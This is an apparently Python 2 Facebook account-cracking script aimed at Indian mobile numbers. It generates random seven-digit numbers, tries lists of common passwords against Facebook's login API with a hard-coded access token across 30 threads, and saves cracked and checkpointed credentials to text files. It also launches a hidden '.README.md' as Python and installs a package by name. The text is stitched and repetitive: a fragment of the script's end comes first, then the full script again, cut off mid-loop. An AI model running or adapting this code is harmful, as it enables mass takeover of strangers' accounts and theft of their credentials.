print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass8 + '\n')
cps.close()
cpb.append(c + user + pass8)
pass9 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>9 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass9 + '\n')
okb.close()
oks.append(c + user + pass9)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass9 + '\n')
cps.close()
cpb.append(c + user + pass9)
else:
pass10 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass10 + '\n')
okb.close()
oks.append(c + user + pass10)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass10 + '\n')
cps.close()
cpb.append(c + user + pass10)
else:
pass11 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass11 + '\n')
okb.close()
oks.append(c + user + pass11)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass11 + '\n')
cps.close()
cpb.append(c + user + pass11)
else:
pass12 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass12 + '\n')
okb.close()
oks.append(c + user + pass12)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass12 + '\n')
cps.close()
cpb.append(c + user + pass12)
pass13 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass13 + '\n')
okb.close()
oks.append(c + user + pass13)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass13 + '\n')
cps.close()
cpb.append(c + user + pass13)
else:
pass14 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>14 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass14 + '\n')
okb.close()
oks.append(c + user + pass14)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass14 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass14 + '\n')
cps.close()
cpb.append(c + user + pass14)
else:
pass15 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass15 + '\n')
okb.close()
oks.append(c + user + pass15)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass15 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass15 + '\n')
cps.close()
cpb.append(c + user + pass15)
else:
pass16 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>16 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass16 + '\n')
okb.close()
oks.append(c + user + pass16)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass16 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass16 + '\n')
cps.close()
cpb.append(c + user + pass16)
pass17 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>17 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass17 + '\n')
okb.close()
oks.append(c + user + pass17)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass17 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass17 + '\n')
cps.close()
cpb.append(c + user + pass17)
else:
pass18 = 'password@'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass18 + '\n')
okb.close()
oks.append(c + user + pass18)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass18 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass18 + '\n')
cps.close()
cpb.append(c + user + pass18)
else:
pass19 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aab<PASSWORD>65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass19 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass19 + '\n')
okb.close()
oks.append(c + user + pass19)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass19 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass19 + '\n')
cps.close()
cpb.append(c + user + pass19)
else:
pass20 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass20 + '\n')
okb.close()
oks.append(c + user + pass20)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass20 + '\n')
cps.close()
cpb.append(c + user + pass20)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50 * '-'
print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
os.system('python2 .README.md')
if __name__ == '__main__':
babaindseven() | bind/pypi_2.py | import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(98969):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print nmbr
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 .README.md')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(3.0 / 200)
def t():
time.sleep(1)
def cb():
os.system('clear')
logo = "\n\x1b[1;91m ______ \x1b[1;95m _____ __ __)\x1b[1;92m ______\n \x1b[1;91m (, / )\x1b[1;97m (, / (, /| / \x1b[1;92m (, / )\n \x1b[1;91m /---( \x1b[1;93m / / | / \x1b[1;92m / /\n\x1b[1;91m ) / ____)\x1b[1;94m___/__ ) / |/ \x1b[1;92m _/___ /_\n\x1b[1;91m(_/ ( (__\x1b[1;96m / (_/ ' \x1b[1;92m (_/___ / \n\x1b[1;90m AUTOMATIC ACCOUNT CRACKER BY \x1b[1;96mBOTOL BABA\n\x1b[1;97m--------------------------------------------------\n\x1b[1;95m\n AUTHOR : <NAME>\n FACEBOOK : FACEBOOK.COM/THEMEHTAN\n YOUTUBE : YOUTUBE.COM/MASTERTRICK1\n GITHUB : GITHUB.COM/BOTOLMEHEDI\n\x1b[1;32m\n--------------------------------------------------\n "
back = 0
successful = []
cpb = []
oks = []
id = []
def babaindseven():
os.system('clear')
print logo
print 'CRACK ONLY 7 DIGITS HACKABLE ACCOUNTS'
print
jalan('\x1b[1;91m [1] \x1b[1;93mSTART CRACK')
print
jalan('\x1b[1;92m [2] UPDATE TOOL')
print
jalan('\x1b[1;96m [3] BACK TO HOME')
print
jalan('\x1b[1;97m [0] EXIT')
print 50 * '-'
action()
def action():
global cpb
global oks
bch = raw_input('\n ===> ')
if bch == '':
print '[!] Fill in correctly'
action()
elif bch == '1':
os.system('clear')
print logo
print
try:
c = raw_input('TYPE ANY 3 DIGIT NUMBER \n\n \x1b[1;93m TYPE ANY CODE FROM 954 TO 997 : ')
k = '+91'
idlist = '.txt'
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except IOError:
print '[!] File Not Found'
raw_input('\n[ Back ]')
babaindseven()
elif bch == '2':
os.system('clear')
os.system('pip2 install --upgrade babaindseven')
os.system('clear')
print logo
print
psb('7 DIGIT INDIAN CRACKER UPDATED SUCCESSFULLY')
time.sleep(2)
os.system('python2 .README.md')
elif bch == '3':
os.system('python2 .README.md')
elif bch == '0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb('[\xe2\x9c\x93] TOTAL NUMBERS: ' + xxx)
time.sleep(0.5)
psb('[\xe2\x9c\x93] PLEASE WAIT, PROCESS IS RUNNING ...')
time.sleep(0.5)
psb('[!] TO STOP THIS PROCESS PRESS Ctrl THEN z')
time.sleep(0.5)
print 50 * '-'
print
def main(arg):
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = <PASSWORD>
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass1 + '\n')
okb.close()
oks.append(c + user + pass1)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass1 + '\n')
cps.close()
cpb.append(c + user + pass1)
else:
pass2 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass2 + '\n')
okb.close()
oks.append(c + user + pass2)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass2 + '\n')
cps.close()
cpb.append(c + user + pass2)
else:
pass3 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass3 + '\n')
okb.close()
oks.append(c + user + pass3)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass3 + '\n')
cps.close()
cpb.append(c + user + pass3)
else:
pass4 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass4 + '\n')
okb.close()
oks.append(c + user + pass4)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass4 + '\n')
cps.close()
cpb.append(c + user + pass4)
pass5 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass5 + '\n')
okb.close()
oks.append(c + user + pass5)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass5 + '\n')
cps.close()
cpb.append(c + user + pass5)
else:
pass6 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass6 + '\n')
okb.close()
oks.append(c + user + pass6)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass6 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass6 + '\n')
cps.close()
cpb.append(c + user + pass6)
else:
pass7 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass7 + '\n')
okb.close()
oks.append(c + user + pass7)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass7 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass7 + '\n')
cps.close()
cpb.append(c + user + pass7)
else:
pass8 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass8 + '\n')
okb.close()
oks.append(c + user + pass8)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass8 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass8 + '\n')
cps.close()
cpb.append(c + user + pass8)
pass9 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>9 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass9 + '\n')
okb.close()
oks.append(c + user + pass9)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass9 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass9 + '\n')
cps.close()
cpb.append(c + user + pass9)
else:
pass10 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass10 + '\n')
okb.close()
oks.append(c + user + pass10)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass10 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass10 + '\n')
cps.close()
cpb.append(c + user + pass10)
else:
pass11 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass11 + '\n')
okb.close()
oks.append(c + user + pass11)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass11 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass11 + '\n')
cps.close()
cpb.append(c + user + pass11)
else:
pass12 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass12 + '\n')
okb.close()
oks.append(c + user + pass12)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass12 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass12 + '\n')
cps.close()
cpb.append(c + user + pass12)
pass13 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n' + '\n'
okb = open('save/successfull.txt', 'a')
okb.write(k + c + user + '|' + pass13 + '\n')
okb.close()
oks.append(c + user + pass13)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass13 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass13 + '\n')
cps.close()
cpb.append(c + user + pass13)
else:
pass14 = '<PASSWORD>'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>14 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
